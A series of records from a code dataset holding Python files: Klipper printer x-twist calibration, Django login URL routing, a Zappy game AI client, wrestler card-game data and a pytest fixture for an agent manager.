'horizontal_move_z') else None,\n 'speed': self.speed if hasattr(self, 'speed') else None,\n 'start_x': self.start_x if hasattr(self, 'start_x') else None,\n 'end_x': self.end_x if hasattr(self, 'end_x') else None,\n 'y': self.y if hasattr(self, 'y') else None\n }\n self.calibrater = Calibrater(\n config, self.pmgr, calibrater_config)\n\n self.enabled = False\n\n # register gcode handlers\n self._register_gcode_handlers()\n\n def _register_gcode_handlers(self):\n # register gcode handlers\n self.gcode = self.printer.lookup_object('gcode')\n self.gcode.register_command(\n 'X_TWIST_COMPENSATE_MESH',\n self.cmd_X_TWIST_COMPENSATE_MESH,\n desc=self.cmd_X_TWIST_COMPENSATE_MESH_help)\n self.gcode.register_command(\n 'X_TWIST_COMPENSATE_STATUS',\n self.cmd_X_TWIST_COMPENSATE_STATUS,\n desc=self.cmd_X_TWIST_COMPENSATE_STATUS_help)\n\n def get_z_compensation_value(self, x_coord, optional_profile_name=None):\n # returns the (lineraly interpolated) z compensation value\n # for the given x coordinate\n # uses the current profile if optional_profile_name is not specified\n enabled = self.pmgr.get_is_enabled()\n if enabled or optional_profile_name is not None:\n current_profile = \\\n self.pmgr.get_current_profile() \\\n if optional_profile_name is None \\\n else self.pmgr.get_profile(optional_profile_name)\n z_compensations = current_profile.z_compensations\n n_points = len(z_compensations)\n spacing = (self.end_x - self.start_x) / (n_points - 1)\n interpolate_t = (x_coord - self.start_x) / spacing\n interpolate_i = int(math.floor(interpolate_t))\n interpolate_i = BedMesh.constrain(interpolate_i, 0, n_points - 2)\n interpolate_t -= interpolate_i\n interpolated_z_compensation = BedMesh.lerp(\n interpolate_t, z_compensations[interpolate_i],\n z_compensations[interpolate_i + 1])\n return interpolated_z_compensation\n else:\n return 0\n\n cmd_X_TWIST_COMPENSATE_MESH_help = \\\n \"Compensate a mesh by applying the x\" \\\n \"twist compensation to the given raw mesh\"\n\n def cmd_X_TWIST_COMPENSATE_MESH(self, gcmd):\n # get the mesh name from the gcode command\n raw_mesh_name = gcmd.get('MESH_NAME', None)\n Helpers.check_non_empty_param(raw_mesh_name, gcmd, 'MESH_NAME')\n\n # get the 
compensation profile name from the gcode command\n compensation_name = gcmd.get('COMPENSATION_NAME', None)\n Helpers.check_non_empty_param(\n compensation_name, gcmd, 'COMPENSATION_NAME')\n\n # get the bed_mesh object, then the bed_mesh profile manager\n bed_mesh = self.printer.lookup_object('bed_mesh', None)\n if not bed_mesh:\n raise gcmd.error(\n \"[bed_mesh] is not specified in your printer configuration\")\n bed_mesh_pmgr = bed_mesh.pmgr\n # load specified bed mesh as active bed mesh\n bed_mesh_pmgr.load_profile(raw_mesh_name)\n # get the active bed mesh\n active_bed_mesh = bed_mesh.get_mesh()\n # modify the probed matrix by applying the x twist compensation\n #modified_probed_matrix = self._modify_probed_matrix(\n # active_bed_mesh, compensation_name)\n\n enabled = self.pmgr.get_is_enabled()\n if enabled or compensation_name is not None:\n current_profile = \\\n self.pmgr.get_current_profile() \\\n if compensation_name is None \\\n else self.pmgr.get_profile(compensation_name)\n z_compensations = current_profile.z_compensations\n modified_probed_matrix = self._modify_probed_matrix_XY(active_bed_mesh, z_compensations[0], z_compensations[1])\n\n # update active mesh with modified probed matrix, save under new name\n #compensated_mesh_name = \\\n # raw_mesh_name + '_compensated_' + compensation_name\n active_bed_mesh.build_mesh(modified_probed_matrix)\n #bed_mesh_pmgr.save_profile(compensated_mesh_name)\n bed_mesh_pmgr.save_profile(raw_mesh_name)\n\n def _modify_probed_matrix_XY(self, bed_mesh, xz, yz):\n \n probed_matrix = bed_mesh.get_probed_matrix()\n compensated_matrix = []\n row_count = len(probed_matrix) - 1\n yz_step = yz / row_count\n col_count = len(probed_matrix[0]) - 1\n xz_step = xz / col_count\n\n for row_index in range(len(probed_matrix)):\n compensated_row = []\n row = probed_matrix[row_index]\n for col_index in range(len(row)):\n z = row[col_index]\n compensated_z = z + (xz_step * col_index) + (yz_step * row_index)\n compensated_row.append(compensated_z)\n compensated_matrix.append(compensated_row)\n\n compensated_matrix = tuple(tuple(row) for row in compensated_matrix)\n return compensated_matrix\n\n def _modify_probed_matrix(self, bed_mesh, compensation_profile_name):\n # do compensating, by modifying z values in probed matrix\n # probed matrix is a list of rows of probed z values\n # eg. 
probed_matrix[0][0] = bottom left corner of mesh, z value\n probed_matrix = bed_mesh.get_probed_matrix()\n compensated_matrix = []\n for row_index in range(len(probed_matrix)):\n compensated_row = []\n row = probed_matrix[row_index]\n for col_index in range(len(row)):\n z = row[col_index]\n x_coord = self._get_mesh_point_x_coord(col_index, bed_mesh)\n compensated_z = z + \\\n self.get_z_compensation_value(\n x_coord, compensation_profile_name)\n compensated_row.append(compensated_z)\n compensated_matrix.append(compensated_row)\n # compensated_matrix is a list of list\n # bed_mesh expects tuple of tuple hence convert\n compensated_matrix = tuple(tuple(row) for row in compensated_matrix)\n return compensated_matrix\n\n def _get_mesh_point_x_coord(self, col_index, mesh):\n # returns the x coordinate of the given column index\n # in the probed matrix\n x_min = mesh.mesh_x_min\n x_range = mesh.mesh_x_max - mesh.mesh_x_min\n x_step = x_range / (len(mesh.probed_matrix[0]) - 1)\n return x_min + col_index * x_step\n\n cmd_X_TWIST_COMPENSATE_STATUS_help = \\\n \"Get the status of the x twist compensation\"\n\n def cmd_X_TWIST_COMPENSATE_STATUS(self, gcmd):\n if (self.pmgr.get_is_enabled()):\n profile = self.pmgr.get_current_profile()\n profile_name = profile.name\n profile_z_compensations = profile.z_compensations\n profile_recommended_z_offset = profile.recommended_z_offset\n gcmd.respond_info(\n \"\"\"\n X twist compensation is enabled\n Profile name: {}\n Profile z compensations: {}\n Profile recommended z offset: {}\n \"\"\".format(profile_name,\n profile_z_compensations, profile_recommended_z_offset))\n else:\n gcmd.respond_info(\n \"X twist compensation is disabled, \"\\\n \"load a profile using X_TWIST_PROFILE_LOAD\"\n )\n\n\nclass Calibrater:\n def __init__(self, config, pmgr, calibrater_config):\n # setup self attributes\n self.printer = config.get_printer()\n self.gcode = self.printer.lookup_object('gcode')\n self.pmgr = pmgr\n self.probe = None\n # probe settings are set to none, until they are available\n self.lift_speed, self.probe_x_offset, self.probe_y_offset, \\\n self.stored_probe_z_offset = None, None, None, None\n self.printer.register_event_handler(\"klippy:connect\",\n self._handle_connect(config))\n self.speed = calibrater_config['speed']\n self.horizontal_move_z = calibrater_config['horizontal_move_z']\n self.start_point = (\n calibrater_config['start_x'], calibrater_config['y'])\n self.end_point = (calibrater_config['end_x'], calibrater_config['y'])\n self.results = []\n self.current_point_index = None\n self.gcmd = None\n\n # register gcode handlers\n self._register_gcode_handlers()\n\n def _handle_connect(self, config):\n # gets probe settings when they are available\n def callback():\n self.probe = self.printer.lookup_object('probe', None)\n if (self.probe is None):\n raise config.error(\n \"X_TWIST_COMPENSATION requires [probe] to be defined\")\n self.lift_speed = self.probe.get_lift_speed()\n self.probe_x_offset, self.probe_y_offset, \\\n self.stored_probe_z_offset = self.probe.get_offsets()\n return callback\n\n def _register_gcode_handlers(self):\n # register gcode handlers\n self.gcode = self.printer.lookup_object('gcode')\n self.gcode.register_command(\n 'X_TWIST_CALIBRATE', self.cmd_X_TWIST_CALIBRATE,\n desc=self.cmd_X_TWIST_CALIBRATE_help)\n\n cmd_X_TWIST_CALIBRATE_help = \"\"\"\n Performs the x twist calibration wizard\n Measure z probe offset at n points along the x axis,\n and calculate x twist compensation\n Specify PROFILE_NAME= - optional, default is 
'default'\n \"\"\"\n\n def cmd_X_TWIST_CALIBRATE(self, gcmd):\n self.gcmd = gcmd\n # performs the x twist calibration wizard\n # get params from command\n profile_name = gcmd.get('PROFILE_NAME', DEFAULT_PROFILE_NAME)\n n_points = gcmd.get_int('N_POINTS', DEFAULT_N_POINTS)\n\n # check for valid profile_name\n Helpers.check_non_empty_param(profile_name, self.gcmd, 'PROFILE_NAME')\n # check for valid n_points\n if n_points is None or n_points < 3:\n raise self.gcmd.error(\n \"N_POINTS to probe must be at least 3\")\n\n # clear the current profile\n self.pmgr.clear_profile()\n\n # calculate some values\n x_range = self.end_point[0] - self.start_point[0]\n interval_dist = x_range / (n_points - 1)\n nozzle_points = self._calculate_nozzle_points(n_points, interval_dist)\n probe_points = self._calculate_probe_points(\n nozzle_points, self.probe_x_offset, self.probe_y_offset)\n\n # verify no other manual probe is in progress\n ManualProbe.verify_no_manual_probe(self.printer)\n\n # begin calibration\n self.current_point_index = 0\n self._calibration(\n profile_name, probe_points, nozzle_points, interval_dist)\n\n def _calculate_nozzle_points(self, n_points, interval_dist):\n # calculate the points to put the probe at, returned as a list of tuples\n nozzle_points = []\n for i in range(n_points):\n x = self.start_point[0] + i * interval_dist\n y = self.start_point[1]\n nozzle_points.append((x, y))\n return nozzle_points\n\n def _calculate_probe_points(self, nozzle_points,\n probe_x_offset, probe_y_offset):\n # calculate the points to put the nozzle at\n # returned as a list of tuples\n probe_points = []\n for point in nozzle_points:\n x = point[0] - probe_x_offset\n y = point[1] - probe_y_offset\n probe_points.append((x, y))\n return probe_points\n\n def _move_helper(self, target_coordinates, override_speed=None):\n # pad target coordinates\n target_coordinates = \\\n (target_coordinates[0], target_coordinates[1], None) \\\n if len(target_coordinates) == 2 else target_coordinates\n toolhead = self.printer.lookup_object('toolhead')\n speed = self.speed if target_coordinates[2] == None else self.lift_speed\n speed = override_speed if override_speed is not None else speed\n toolhead.manual_move(target_coordinates, speed)\n\n def _calibration(self, profile_name, probe_points, nozzle_points, interval):\n # begin the calibration process\n self.gcmd.respond_info(\"X_TWIST_CALIBRATE: Probing point %d of %d\" % (\n self.current_point_index + 1, len(probe_points)))\n\n # horizontal_move_z (to prevent probe trigger or hitting bed)\n self._move_helper((None, None, self.horizontal_move_z))\n\n # move to point to probe\n self._move_helper((probe_points[self.current_point_index]\n [0], probe_points[self.current_point_index][1], None))\n\n # probe the point\n self.probe.run_probe(self.gcmd)\n\n # horizontal_move_z (to prevent probe trigger or hitting bed)\n self._move_helper((None, None, self.horizontal_move_z))\n\n # move the nozzle over the probe point\n self._move_helper((nozzle_points[self.current_point_index]))\n\n # start the manual (nozzle) probe\n ManualProbe.ManualProbeHelper(\n self.printer, self.gcmd,\n self._manual_probe_callback_factory(profile_name,\n probe_points, nozzle_points, interval))\n\n def _manual_probe_callback_factory(self, profile_name, probe_points,\n nozzle_points, interval):\n # returns a callback function for the manual probe\n is_end = self.current_point_index == len(probe_points) - 1\n\n def callback(kin_pos):\n if kin_pos is None:\n # probe was cancelled\n self.gcmd.respond_info(\n 
\"X_TWIST_CALIBRATE: Probe cancelled, calibration aborted\")\n return\n z_offset = self.stored_probe_z_offset - kin_pos[2]\n self.results.append(z_offset)\n if is_end:\n # end of calibration\n self._finalize_calibration(profile_name)\n else:\n # move to next point\n self.current_point_index += 1\n self._calibration(\n profile_name, probe_points, nozzle_points, interval)\n return callback\n\n def _finalize_calibration(self, profile_name):\n # finalize the calibration process\n # calculate average of results\n avg = sum(self.results) / len(self.results)\n # subtract average from each result\n # so that they are independent of z_offset\n self.results = [avg - x for x in self.results]\n # create a new profile using profile manager\n self.pmgr.create_profile(profile_name, self.results, avg)\n # recommend z offset to user\n self.gcmd.respond_info(\n \"X_TWIST_CALIBRATE: Calibration complete, reccomended z_offset: %f\"\n % (avg))\n\n\nclass Profile:\n PROFILE_OPTIONS = {\n 'z_compensations': str, 'recommended_z_offset': float\n }\n\n def __init__(self, name, z_compensations, recommended_z_offset):\n self.name = name\n self.z_compensations = z_compensations\n self.recommended_z_offset = recommended_z_offset\n\n\nclass ProfileManager:\n def __init__(self, config, x_twist_compensation):\n # setup self attributes\n self.name = config.get_name()\n self.printer = config.get_printer()\n self.x_twist_compensation = x_twist_compensation\n self.profiles = {}\n self.gcode = self.printer.lookup_object('gcode')\n self.current_profile = None\n\n # fetch the stored profiles\n self._fetch_stored_profiles(config)\n logging.info('stored profiles: %s', self.profiles)\n\n # register gcode handlers\n self._register_gcode_handlers()\n\n def get_is_enabled(self):\n # returns\n return self.current_profile is not None\n\n def get_current_profile(self):\n # return the current profile\n if self.current_profile is None:\n raise self.gcode.error(\n \"No X_TWIST_PROFILE loaded\")\n return self.current_profile\n\n def get_profiles(self):\n # dictionary of profiles loaded from printer.cfg, key is profile name\n return self.profiles\n\n def get_profile(self, profile_name):\n # attempt to get profile from self.profiles\n # throws error if profile does not exist or is corrupt\n logging.info('attempting to get profile name %s', profile_name)\n logging.info('available profiles: %s', self.profiles)\n profile = self.profiles.get(profile_name, None)\n if profile is None:\n raise self.gcode.error(\n \"X_TWIST_PROFILE %s does not exist\" % (profile_name))\n z_compensations = profile.get('z_compensations', None)\n if z_compensations is None:\n raise self.gcode.error(\n \"X_TWIST_PROFILE %s does not have z_compensations\"\n % (profile_name))\n recommended_z_offset = profile.get('recommended_z_offset', None)\n if recommended_z_offset is None:\n raise self.gcode.error(\n \"X_TWIST_PROFILE %s does not have recommended_z_offset\"\n % (profile_name))\n return Profile(profile_name, z_compensations, recommended_z_offset)\n\n def _fetch_stored_profiles(self, config):\n # fetch stored profiles in printer.cfg\n # (using prefix of \"x_twist_compensation\"\")\n stored_profiles = config.get_prefix_sections(self.name)\n stored_profiles = [\n stored_profile for stored_profile in stored_profiles\n if stored_profile.get_name() != self.name\n ]\n # add stored profiles to self.profiles\n for stored_profile in stored_profiles:\n prefixed_name = stored_profile.get_name()\n # remove prefix from name\n name = prefixed_name.split(' ', 1)[1]\n self.profiles[name] 
= {}\n for option, option_type in Profile.PROFILE_OPTIONS.items():\n if option_type == float:\n self.profiles[name][option] = stored_profile.getfloat(\n option)\n elif option_type == str:\n value = stored_profile.get(option)\n if option == 'z_compensations':\n self.profiles[name][option] = \\\n Helpers.parse_comma_separated_floats(value)\n else:\n self.profiles[name][option] = stored_profile.get(\n option)\n\n def _register_gcode_handlers(self):\n # register gcode handlers\n self.gcode.register_command(\n 'X_TWIST_PROFILE', self.cmd_X_TWIST_PROFILE,\n desc=self.cmd_X_TWIST_PROFILE_help)\n self.gcode.register_command(\n 'X_TWIST_PROFILE_LOAD', self.cmd_X_TWIST_PROFILE_LOAD,\n desc=self.cmd_X_TWIST_PROFILE_LOAD_help)\n self.gcode.register_command(\n 'X_TWIST_PROFILE_SAVE', self.cmd_X_TWIST_PROFILE_SAVE,\n desc=self.cmd_X_TWIST_PROFILE_SAVE_help)\n self.gcode.register_command(\n 'X_TWIST_PROFILE_DELETE', self.cmd_X_TWIST_PROFILE_DELETE,\n desc=self.cmd_X_TWIST_PROFILE_DELETE_help)\n self.gcode.register_command(\n 'X_TWIST_PROFILE_CLEAR', self.cmd_X_TWIST_PROFILE_CLEAR,\n desc=self.cmd_X_TWIST_PROFILE_CLEAR_help)\n\n def create_profile(self, profile_name, z_compensations,\n recommended_z_offset):\n # create a new profile\n new_profile = Profile(\n profile_name, z_compensations, recommended_z_offset)\n # save the profile\n self._save_profile(new_profile)\n\n def load_profile(self, profile_name):\n # set the current profile\n self.current_profile = self.get_profile(profile_name)\n\n def clear_profile(self):\n # clear the current profile\n self.current_profile = None\n\n def delete_profile(self, profile_name):\n # try getting the profile to ensure it exists\n self.get_profile(profile_name)\n # remove the profile from config file\n configfile = self.printer.lookup_object('configfile')\n configfile.remove_section('%s %s' % (self.name, profile_name))\n # remove the profile from self.profiles\n profiles = dict(self.profiles)\n del profiles[profile_name]\n self.profiles = profiles\n # inform user to save deletion\n self.gcode.respond_info(\n \"Profile [%s] removed from storage for this session.\\n\"\n \"The SAVE_CONFIG command will update the printer\\n\"\n \"configuration and restart the printer\" % (profile_name))\n\n def _save_profile(self, profile):\n profile_name = profile.name\n config_name = '%s %s' % (self.name, profile_name)\n configfile = self.printer.lookup_object('configfile')\n # save the profile to config file\n # also save to self.profiles, make sure immutable by making a copy\n profiles = dict(self.profiles)\n profiles[profile_name] = new_profile = {}\n for option, option_type in Profile.PROFILE_OPTIONS.items():\n value = getattr(profile, option)\n if option_type == float:\n value = float(value)\n new_profile[option] = value # save to self.profiles\n configfile.set(config_name, option,\n Helpers.format_float_to_n_decimals(value))\n elif option_type == str:\n if option == 'z_compensations':\n # convert to list of floats\n value = [float(x) for x in value]\n new_profile[option] = value # save to self.profiles\n value_as_str = [Helpers.format_float_to_n_decimals(\n x) for x in value] # convert to list of strs\n configfile.set(config_name, option, ', '.join(\n value_as_str)) # store as comma separated\n else:\n new_profile[option] = value # save to self.profiles\n configfile.set(config_name, option, value)\n # inform user to save changes\n self.gcode.respond_info(\n \"X_TWIST_COMPENSATION state has been saved to profile [%s]\\n\"\n \"for the current session. 
The SAVE_CONFIG command will\\n\"\n \"update the printer config file and restart the printer.\"\n % (profile_name))\n\n def save_current_profile(self, profile_name):\n # get the current profile\n profile = self.get_current_profile()\n # set the name\n profile.name = profile_name\n # save the profile\n self._save_profile(profile)\n\n cmd_X_TWIST_PROFILE_LOAD_help = \\\n \"Loads a saved mesh as the active mesh\"\n\n def cmd_X_TWIST_PROFILE_LOAD(self, gcmd):\n # loads a saved mesh as the active mesh\n profile_name = gcmd.get('NAME', None)\n Helpers.check_non_empty_param(profile_name, gcmd, 'NAME')\n self.load_profile(profile_name)\n\n cmd_X_TWIST_PROFILE_CLEAR_help = \\\n \"Clears the active mesh\"\n\n def cmd_X_TWIST_PROFILE_CLEAR(self, gcmd):\n # clears the active mesh\n self.clear_profile()\n\n cmd_X_TWIST_PROFILE_SAVE_help = \\\n \"Saves the active mesh to the config file\"\n\n def cmd_X_TWIST_PROFILE_SAVE(self, gcmd):\n # saves the active mesh to the config file\n profile_name = gcmd.get('NAME', None)\n Helpers.check_non_empty_param(profile_name, gcmd, 'NAME')\n self.save_current_profile(profile_name)\n\n cmd_X_TWIST_PROFILE_DELETE_help = \\\n \"Deletes a saved profile from the config file\"\n\n def cmd_X_TWIST_PROFILE_DELETE(self, gcmd):\n # deletes a saved mesh from the config file\n profile_name = gcmd.get('NAME', None)\n Helpers.check_non_empty_param(profile_name, gcmd, 'NAME')\n self.delete_profile(profile_name)\n\n cmd_X_TWIST_PROFILE_help = \\\n \"Prints information on how to use the X_TWIST_PROFILE command\"\n\n def cmd_X_TWIST_PROFILE(self, gcmd):\n raise self.gcode.error(\n \"\"\"\n Please follow the following syntax:\n X_TWIST_PROFILE_LOAD NAME=\n X_TWIST_PROFILE_SAVE NAME=\n X_TWIST_PROFILE_DELETE NAME=\n X_TWIST_PROFILE_CLEAR\n \"\"\"\n )\n\n\nclass Helpers:\n @staticmethod\n def format_float_to_n_decimals(raw_float, n=6):\n # format float to n decimals, defaults to 6\n return \"{:.{}f}\".format(raw_float, n)\n\n @staticmethod\n def parse_comma_separated_floats(comma_separated_floats):\n # parse comma separated floats into list of floats\n return [float(value) for value in comma_separated_floats.split(', ')]\n\n @staticmethod\n def check_non_empty_param(param_str, gcmd, param_name=None):\n # throws gcmd error if parameter is None or just spaces\n if param_str is None or not param_str.strip():\n error = \"Parameter [%s] is required\" % (\n param_name) if param_name else \"Parameter is required\"\n raise gcmd.error(error)\n\n# klipper's entry point using [x_twist_compensation] section in printer.cfg\n\n\ndef load_config(config):\n return XTwistCompensation(config)","repo_name":"QIDITECH/klipper","sub_path":"klippy/extras/x_twist_compensation.py","file_name":"x_twist_compensation.py","file_ext":"py","file_size_in_byte":26963,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"3602800859","text":"from LoginModule import views, validateDataForRegister, validateDataForLogin\r\nfrom django.urls.conf import path\r\n\r\nurlpatterns = [\r\n path('', views.login, name=\"login\"),\r\n path('register', views.register, name=\"login\"),\r\n path('validateDataForRegister', validateDataForRegister.userNameForm, name=\"userNameForm\"),\r\n path('validateDataForLogin', validateDataForLogin.userNameForm, 
name=\"userNameForm\")\r\n\r\n]","repo_name":"Ocirederf94/CAH","sub_path":"LoginModule/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"25459150387","text":"#!/usr/bin/env python3.4\n\nimport signal\nimport select\nimport sys\n\nfrom ModuleConnect import *\nfrom GetOptions import *\nfrom MessageClass import *\nfrom InterpretClass import *\nfrom CommandClass import *\nfrom IAClass import *\nfrom threading import Thread\n\n__author__ = \"Nicolas Charvoz\"\n__copyright__ = \"Copyright 2015, La Pintade\"\n__credits__ = [\"Nicolas Charvoz\", \"Louis Audibert\", \"Serge Heitzler\",\n \"Antoine Garcia\"]\n__license__ = \"GPL\"\n__versione__ = \"1.1.1\"\n__email__ = \"nicolas.charvoz@epitech.eu\"\n__status__ = \"Dev\"\n\np = GetOptions()\nmess = MessageClass()\nic = InterpretClass()\ncc = CommandClass()\ns = None\n\ndef send_name_to_server(s):\n if (p.getName()):\n var = p.getName()\n else:\n self.team = 'Team'\n self.team += str(random.randint(1,10))\n var += '\\r\\n'\n mess.sendMessage(s, var)\n\ndef protocol(s):\n rec = mess.readMessage(s)\n if (ic.interpret_bienvenue(s, rec, p) == 1):\n send_name_to_server(s)\n else:\n print('The server has not send the Bienvenue message')\n sys.exit(0)\n rec = mess.readMessage(s)\n if (ic.interpret_num_client(s, rec, p) == -1):\n print('Cannot connect to the server, too many teamate already connected')\n s.close()\n sys.exit(0)\n rec = mess.readMessage(s)\n ic.interpret_size(s, rec, p)\n var = 'OK'\n var += '\\r\\n'\n #mess.sendMessage(s, var)\n\ndef listenToServer(s):\n flag = False\n while not flag:\n data = mess.readMessage(s)\n if not data:\n print('Shutting down.')\n flag = True\n sys.exit(0)\n elif data == 'mort\\n':\n print('You died')\n flag = True\n sys.exit(0)\n else:\n sys.stdout.write('SERVER: ' + data + '\\n')\n sys.stdout.flush()\n\ndef main():\n try:\n p.parseOpt()\n if not p.getName():\n print('Exception : You need a name to start')\n sys.exit()\n mc = ModuleConnect()\n s = mc.connect(p.getHost(), p.getPort())\n protocol(s)\n flag = False\n while not flag:\n try:\n if not p.getDbg():\n ia = IAClass(s, p, mess)\n threadIA = ia.run()\n threadServer = listenToServer(s)\n threadIA.start()\n threadServer.start()\n threadIA.join()\n threadServer.join()\n else:\n sys.stdout.write('$> ')\n sys.stdout.flush()\n inputready, outputready, execptready = select.select([0, s], [], [])\n for i in inputready:\n if i == 0:\n data = sys.stdin.readline().strip()\n if data:\n data += '\\r\\n'\n mess.sendMessage(s, data)\n elif i == s:\n data = mess.readMessage(s)\n if not data:\n print('Shutting down.')\n flag = True\n break\n elif data == 'mort\\n':\n print('You died')\n flag = True\n break\n else:\n sys.stdout.write('SERVER: ' + data + '\\n')\n sys.stdout.flush()\n except KeyboardInterrupt:\n print('Interrupted.')\n s.close()\n break\n\n except ConnectionRefusedError:\n print('Exception : The server has refused the connection')\n #except getopt.GetoptError:\n print('Usage : client.py [-n [NAME]] [-h [HOST]] [-p [PORT]] [--dbg]')\n except ConnectionResetError:\n print('The server has shutdown')\n except BrokenPipeError:\n print('The server has hung up')\n# except TypeError:\n # print('Parsing error, cannot handle too much things ..')\n #except:\n # print('Exception : An error has occured')\n\nif __name__ == \"__main__\":\n main()\n\n\n\n\n # sys.stdout.write('$> ')\n # sys.stdout.flush()\n # inputready, outputready, execptready = 
select.select([0, s], [], [])\n # for i in inputready:\n # if i == 0:\n # data = sys.stdin.readline().strip()\n # if data:\n # act_command(s)\n # data += '\\r\\n'\n # #mess.sendMessage(s, data)\n # elif i == s:\n # data = mess.readMessage(s)\n # if not data:\n # print('Shutting down.')\n # flag = True\n # break\n # elif data == 'mort':\n # print('You died')\n # flag = True\n # break\n # else:\n # sys.stdout.write('SERVER: ' + data + '\\n')\n # sys.stdout.flush()\n","repo_name":"Hiruxou/Epitech-2","sub_path":"PSU_2014_zappy/sources/client/zappy_ai.py","file_name":"zappy_ai.py","file_ext":"py","file_size_in_byte":5266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"31664001298","text":"from data.globalConstants import *\r\n# Sgt. Slaughter\r\nname = 'Sgt. Slaughter'\r\n\r\n# General Card Definitions: \r\n# 1000 = OC\r\n# 1001 = OC/TT\r\n# 1002 = DC\r\nGeneralCard = [1002, 1002, 1001, 1002, 1000, 1000, 1000, 1002, 1002, 1002, 1000]\r\n\r\n# Offensive Card Definitions:\r\n# 1003 = Pin attempt move (P/A)\r\n# 1004 = Submission Move (*)\r\n# 1005 = Specialty Move (S)\r\n# 1006 = Disqualification Move (DQ)\r\n# 1008 = Regular Offensive Move\r\n# 1009 = Grudge Match Move (XX)\r\n# 1010 = Ropes Move (ROPES)\r\nOffensiveCard = \\\r\n[ {'MOVE_POINTS': 10, 'MOVE_TYPE': 1004, 'MOVE_NAME': 'FT. DIX SLEEPER'},\r\n {'MOVE_POINTS': 5, 'MOVE_TYPE': 1008, 'MOVE_NAME': 'DROPKICK'},\r\n {'MOVE_POINTS': 9, 'MOVE_TYPE': 1008, 'MOVE_NAME': 'BILOXI SUPLEX'},\r\n {'MOVE_POINTS': 8, 'MOVE_TYPE': 1008, 'MOVE_NAME': 'MILITARY PILEDRIVER'},\r\n {'MOVE_POINTS': 7, 'MOVE_TYPE': 1009, 'MOVE_NAME': 'ARM DRAG'},\r\n {'MOVE_POINTS': 9, 'MOVE_TYPE': 1008, 'MOVE_NAME': 'FOREARM TO FACE'},\r\n {'MOVE_POINTS': 8, 'MOVE_TYPE': 1008, 'MOVE_NAME': 'ELBOW TO STERNUM'},\r\n {'MOVE_TYPE': 1005, 'MOVE_NAME': 'COMBAT CLUTCH'},\r\n {'MOVE_POINTS': 10, 'MOVE_TYPE': 1003, 'MOVE_NAME': 'CANNON'},\r\n {'MOVE_POINTS': 11, 'MOVE_TYPE': 1008, 'MOVE_NAME': 'SLAM INTO RING POST'},\r\n {'MOVE_TYPE': 1010, 'MOVE_NAME': 'ROPES'}]\r\n\r\n# Defensive Card Definitions:\r\n# 0 = B - No points on defense\r\n# 2 = A - 2 points on defense\r\n# 4 = C - 4 points on defense and neutralize offensive move\r\n# 5 = Reverse - Reverse offensive move\r\nDefensiveCard = [2, 0, 2, 5, 4, 2, 0, 2, 2, 0, 0]\r\n\r\n# Specialty Card Definitions:\r\n# 1003 = Pin attempt move (P/A)\r\n# 1004 = Submission Move (*)\r\n# 1005 = Specialty Move (S)\r\nSpecialty = { 'COMBAT CLUTCH': [ {'MOVE_POINTS': 12, 'MOVE_TYPE': 1004},\r\n {'MOVE_POINTS': 10, 'MOVE_TYPE': 1005},\r\n {'MOVE_POINTS': 13, 'MOVE_TYPE': 1005},\r\n {'MOVE_POINTS': 9, 'MOVE_TYPE': 1005},\r\n {'MOVE_POINTS': 11, 'MOVE_TYPE': 1003},\r\n {'MOVE_POINTS': 11, 'MOVE_TYPE': 1004}]}\r\n\r\n# Ropes Card Definitions:\r\n# 1003 = Pin attempt move (P/A)\r\n# 1004 = Submission Move (*)\r\n# 1005 = Specialty Move (S)\r\n# 1006 = Disqualification Move (DQ)\r\n# 1008 = Regular Offensive Move\r\n# 1009 = Grudge Match Move (XX)\r\n# 1010 = Ropes Move (ROPES)\r\n# 1014 = No Action (NA)\r\nRopes = \\\r\n[ {'MOVE_POINTS': 0, 'MOVE_TYPE': 1014, 'MOVE_NAME': 'NA'},\r\n {'MOVE_POINTS': 0, 'MOVE_TYPE': 1014, 'MOVE_NAME': 'NA'},\r\n {'MOVE_POINTS': 8, 'MOVE_TYPE': 1008, 'MOVE_NAME': 'BODY BLOCK'},\r\n {'MOVE_POINTS': 7, 'MOVE_TYPE': 1008, 'MOVE_NAME': 'SHOULDER BLOCK'},\r\n {'MOVE_POINTS': 0, 'MOVE_TYPE': 1014, 'MOVE_NAME': 'NA'},\r\n {'MOVE_POINTS': 9, 'MOVE_TYPE': 1003, 'MOVE_NAME': 'CANNON'},\r\n {'MOVE_POINTS': 10, 'MOVE_TYPE': 1008, 'MOVE_NAME': 'CANNON'},\r\n 
{'MOVE_POINTS': 0, 'MOVE_TYPE': 1014, 'MOVE_NAME': 'NA'},\r\n {'MOVE_POINTS': 0, 'MOVE_TYPE': 1014, 'MOVE_NAME': 'NA'},\r\n {'MOVE_POINTS': 9, 'MOVE_TYPE': 1008, 'MOVE_NAME': 'CANNON'},\r\n {'MOVE_POINTS': 10, 'MOVE_TYPE': 1003, 'MOVE_NAME': 'GOMER PYLEDRIVER'}]\r\n\r\nSub = (2, 3)\r\nTagTeam = (2, 6)\r\nPriority = (5.5, 2)\r\nnameSet = \"Promoter's Dream\"\r\n","repo_name":"BackupTheBerlios/pws","sub_path":"Wrestlers/SargentSlaughter.py","file_name":"SargentSlaughter.py","file_ext":"py","file_size_in_byte":3257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"31010291026","text":"import pytest\nfrom unittest.mock import Mock\nfrom perry.agents.manager import AgentManager\nfrom perry.agents.base import AgentRegistry\nfrom perry.db.operations.agents import read_agent\nfrom tests.agents.fixtures import DummyAgent\nfrom datetime import datetime, timedelta\nimport freezegun\n\n\ndef mock_time():\n return datetime(2021, 1, 1)\n\n\n@pytest.fixture\ndef manager():\n yield AgentManager()\n AgentManager.reset()\n\n\n@pytest.fixture\ndef dummy_agent(test_db, add_agent_to_db, monkeypatch):\n with freezegun.freeze_time(mock_time()):\n agent_id = add_agent_to_db()\n db_agent = read_agent(test_db, agent_id)\n monkeypatch.setattr(\"perry.agents.manager.read_agent\", lambda db, id: db_agent)\n\n AgentRegistry().register_agent(DummyAgent)\n agent = DummyAgent(test_db, {\"name\": \"dummy\"}, agent_id)\n agent.save()\n monkeypatch.setattr(\"perry.agents.base.BaseAgent.load\", lambda db, id: agent)\n\n return agent\n\n\ndef test_load_agent_populates_dict(test_db, dummy_agent, manager, monkeypatch):\n test_id = 1\n agent = manager.load_agent(test_db, test_id)\n 